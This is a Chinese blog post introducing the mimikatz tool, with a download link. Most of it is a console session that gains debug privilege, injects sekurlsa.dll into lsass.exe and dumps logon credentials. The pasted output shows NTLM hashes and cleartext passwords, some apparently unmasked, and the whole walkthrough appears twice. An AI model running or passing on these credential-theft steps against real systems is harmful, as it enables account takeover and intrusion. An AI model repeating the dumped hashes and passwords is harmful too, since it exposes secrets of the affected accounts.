輕量級偵錯程式mimikatz
神器下載地址:
http://blog.gentilkiwi.com/mimikatz
還有一篇用這個神器直接從 lsass.exe 裡獲取windows處於active狀態賬號明文密碼的文章
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
測試:
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */
// http://blog.gentilkiwi.com/mimikatz
[@more@]mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 1292
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;660047
Package d'authentification : NTLM
Utilisateur principal : __vmware_user__
Domaine d'authentification : LYP-1284
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 2454c4f215
a6da00ba5cbe2fa01cf929 }
wdigest : @GIsJ%z%qsHf3PHx#7c@BDCjiDc59_3*
kerberos : @GIsJ%z%qsHf3PHx#7c@BDCjiDc59_3*
Authentification Id : 0;162806
Package d'authentification : NTLM
Utilisateur principal : l1284
Domaine d'authentification : LYP-1284
msv1_0 : lm{ fcd7cd0b55c54cb4aad3b435b51404ee }, ntlm{ e3e2cb3618
bd1e24e4f4536949ccc268 }
wdigest : sxxxxxx
kerberos : sxxxxxx
Authentification Id : 0;161318
Package d'authentification : NTLM
Utilisateur principal : l1284
Domaine d'authentification : LYP-1284
msv1_0 : lm{ fcd7cd0b55c54cb4aad3b435b51404ee }, ntlm{ e3e2cb3618
bd1e24e4f4536949ccc268 }
wdigest : sxxxxxx
kerberos : sxxxxxx
Authentification Id : 0;997
Package d'authentification : Negotiate
Utilisateur principal : LOCAL SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos :
Authentification Id : 0;996
Package d'authentification : Negotiate
Utilisateur principal : NETWORK SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d1
6ae931b73c59d7e0c089c0 }
wdigest :
kerberos :
Authentification Id : 0;71103
Package d'authentification : NTLM
Utilisateur principal :
Domaine d'authentification :
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos : n.t. (LUID KO)
Authentification Id : 0;999
Package d'authentification : NTLM
Utilisateur principal : LYP-1284$
Domaine d'authentification : HSX
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos :
mimikatz #
http://blog.gentilkiwi.com/mimikatz
還有一篇用這個神器直接從 lsass.exe 裡獲取windows處於active狀態賬號明文密碼的文章
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
測試:
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */
// http://blog.gentilkiwi.com/mimikatz
[@more@]mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 1292
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;660047
Package d'authentification : NTLM
Utilisateur principal : __vmware_user__
Domaine d'authentification : LYP-1284
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 2454c4f215
a6da00ba5cbe2fa01cf929 }
wdigest : @GIsJ%z%qsHf3PHx#7c@BDCjiDc59_3*
kerberos : @GIsJ%z%qsHf3PHx#7c@BDCjiDc59_3*
Authentification Id : 0;162806
Package d'authentification : NTLM
Utilisateur principal : l1284
Domaine d'authentification : LYP-1284
msv1_0 : lm{ fcd7cd0b55c54cb4aad3b435b51404ee }, ntlm{ e3e2cb3618
bd1e24e4f4536949ccc268 }
wdigest : sxxxxxx
kerberos : sxxxxxx
Authentification Id : 0;161318
Package d'authentification : NTLM
Utilisateur principal : l1284
Domaine d'authentification : LYP-1284
msv1_0 : lm{ fcd7cd0b55c54cb4aad3b435b51404ee }, ntlm{ e3e2cb3618
bd1e24e4f4536949ccc268 }
wdigest : sxxxxxx
kerberos : sxxxxxx
Authentification Id : 0;997
Package d'authentification : Negotiate
Utilisateur principal : LOCAL SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos :
Authentification Id : 0;996
Package d'authentification : Negotiate
Utilisateur principal : NETWORK SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d1
6ae931b73c59d7e0c089c0 }
wdigest :
kerberos :
Authentification Id : 0;71103
Package d'authentification : NTLM
Utilisateur principal :
Domaine d'authentification :
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos : n.t. (LUID KO)
Authentification Id : 0;999
Package d'authentification : NTLM
Utilisateur principal : LYP-1284$
Domaine d'authentification : HSX
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos :
mimikatz #
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/678020/viewspace-1059498/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 微信偵錯程式
- [譯文]greenlet:輕量級併發程式
- Xcode偵錯程式LLDBXCodeLLDB
- go語言偵錯程式Go
- 輕量級超級 css 工具CSS
- 偵錯程式工作原理(三):除錯資訊除錯
- 偵錯程式工作原理(3):除錯資訊除錯
- 輕量級多級選單控制框架程式(C語言)框架C語言
- Python 偵錯程式入門Python
- 偵錯程式到底怎樣工作
- PsySH作為偵錯程式
- 偵錯程式--jdb.exe(轉)
- 輕量級UI元件 MagicUI元件
- 輕量級IOC框架:Ninject框架
- Emacs 除錯祕籍之 GUD 偵錯程式Mac除錯
- 反除錯 -- 利用ptrace阻止偵錯程式附加除錯
- 另一個Swoole偵錯程式 - Yasd
- 偵錯程式是個大騙子!
- GDB偵錯程式(學習筆記)筆記
- 使用GDB命令列偵錯程式除錯C/C++程式命令列除錯C++
- Flutter路由輕量級框架FRouterFlutter路由框架
- 輕量級orm框架——gzero指南ORM框架
- iOS 輕量級 HTML 解析方案iOSHTML
- JAVA輕量級鎖簡介Java
- 輕量級Web框架Flask(二)Web框架Flask
- [ElasticSearch ]2輕量級搜尋Elasticsearch
- 輕量級標記語言
- Magic:輕量級JavaScript UI元件JavaScriptUI元件
- 超輕量級PHP框架BroPHPPHP框架
- mysqlrouter 輕量級中介軟體MySql
- CodeBlocks偵錯程式設定錯誤問題BloC
- Linux gdb偵錯程式用法全面解析Linux
- iOS Debuger(便捷輔助偵錯程式)iOS
- 偵錯程式工作原理(1):基礎篇
- Linux 核心偵錯程式內幕(轉)Linux
- 輕量級API測試工具PandariaAPI
- looter——超輕量級爬蟲框架爬蟲框架
- 輕量級日誌收集方案LokiLoki